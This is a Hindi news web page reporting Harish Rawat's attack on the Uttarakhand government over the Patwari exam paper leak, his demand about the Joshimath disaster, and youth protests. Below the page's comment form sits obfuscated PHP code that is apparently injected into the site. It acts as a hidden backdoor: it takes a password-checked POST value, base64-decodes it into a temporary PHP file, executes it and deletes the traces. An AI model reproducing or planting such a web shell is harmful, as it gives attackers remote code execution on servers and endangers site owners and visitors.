Patwari paper leak: हरीश रावत ने सरकार को लीक एक्सपर्ट बताया, कहा- युवाओं से मांगता हूं माफी

Uttarakhand Press News, 14 January 2023: हल्द्वानी: राज्य के पूर्व मुख्यमंत्री हरीश रावत ने पटवारी भर्ती परीक्षा पेपर लीक मामले में राज्य सरकार पर हमला बोला है. हरीश रावत ने धामी सरकार को लीक एक्सपर्ट बताया है. उन्होंने कहा कि भर्ती परीक्षा को लीक सरकार के संरक्षण में किया जा रहा है, क्योंकि जब यूकेएसएसएससी भर्ती घोटाले में हाकम सिंह का नाम आया था, उस समय भी कांग्रेस ने हाकम सिंह को संरक्षण देने वाले लोगों पर भी कार्रवाई करने की बात कही थी. लेकिन सरकार ने उसे अनसुना कर दिया और आज उसी का परिणाम पटवारी भर्ती परीक्षा का पेपर लीक होना है. वहीं गढ़वाल सांसद तीरथ सिंह रावत ने पेपर लीक होने को दुर्भाग्यपूर्ण बताया है.

हरीश रावत ने युवाओं से माफी मांगी: हरीश रावत ने कहा कि कहा कि सत्ता से जुड़े लोग इसमें शामिल हैं जिनकी जड़ें काफी गहरी हैं. ऐसे में उन्होंने कहा कि भर्ती परीक्षा की तैयारी करने वाले छात्रों से मैं खुद माफी मांगता हूं, क्योंकि राज्य की सरकार मैं बैठे लोग युवाओं से माफी तो नहीं मांगेंगे. उन्होंने कहा कि लगातार भर्तियों के पेपर लीक होना परीक्षाओं की तैयारी करने वाले युवाओं और हम सब के लिए चिंता का विषय है.

जोशीमठ आपदा में दी हिदायत: पूर्व मुख्यमंत्री हरीश रावत ने जोशीमठ में आई आपदा को राष्ट्रीय आपदा घोषित करने की मांग की है. पूर्व सीएम हरीश रावत का कहना है, उत्तराखंड के पास संसाधनों की काफी कमी है. ऐसे में केंद्र से राज्य को मदद की बेहद दरकरार है. उन्होंने कहा कि कांग्रेस के प्रतिनिधिमंडल ने मुख्यमंत्री से जोशीमठ आपदा को लेकर मुलाकात भी की थी और सरकार को कई सारे सुझाव भी दिए थे. जिनमें इन दो दिनों के अंदर राज्य सरकार द्वारा कुछ बदलाव देखने को मिले हैं.

सरकार को बनानी चाहिए मजबूत नीति: उन्होंने कहा कि वर्ष 2013 की केदारनाथ आपदा ने वहां के हर छोटे-बड़े व्यवसायियों को नुकसान पहुंचाया था, उसकी भरपाई राज्य सरकार ने की थी. घोड़े व्यवसायी से लेकर होटल व्यवसायी तक को राज्य सरकार ने मुआवजे की परिधि में शामिल किया था, ताकि उनको भी राहत दी जा सके. उन्होंने कहा कि जोशीमठ के पुनर्निर्माण के साथ वहां के लोगों को उचित मुआवजा दिए जाने को लेकर सरकार को एक मजबूत नीति बनानी होगी. साथ ही केंद्र सरकार से भी जोशीमठ के लिए बड़े पैकेज की मांग करनी चाहिए, ताकि जोशीमठ आपदा में मदद कर सके.

पटवारी भर्ती पेपर लीक पर क्या बोले तीरथ: पौड़ी में पटवारी-लेखपाल भर्ती परीक्षा का पेपर लीक होने को बाद युवाओं का गुस्सा सातवें आसमान पर है. जिला मुख्यालय पौड़ी में स्थानीय युवाओं के साथ यूथ कांग्रेस ने सरकार के खिलाफ जमकर नारेबाजी की. युवाओं ने प्रदर्शन करते हुए सरकार का पुतला दहन कर राज्यपाल को ज्ञापन भेजा. साथ ही भर्ती घोटाले की सीबीआई जांच करते हुए राज्य सरकार को बर्खास्त करने की मांग उठायी. वहीं गढ़वाल सांसद तीरथ सिंह रावत ने पेपर लीक होने को दुर्भाग्यपूर्ण बताया. उन्होंने आरोपियों को कड़ी सजा देने की पैरवी की.

Read Previous

Odisha Woman Cricketer Dead: पेड़ से लटका मिला महिला क्रिकेटर का शव, कोच पर हत्या के आरोप

Read Next

UKSSSC की भर्ती निरस्त करने पर हाईकोर्ट ने मांगा जवाब, राज्य सरकार व आयोग को जारी किया नोटिस

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}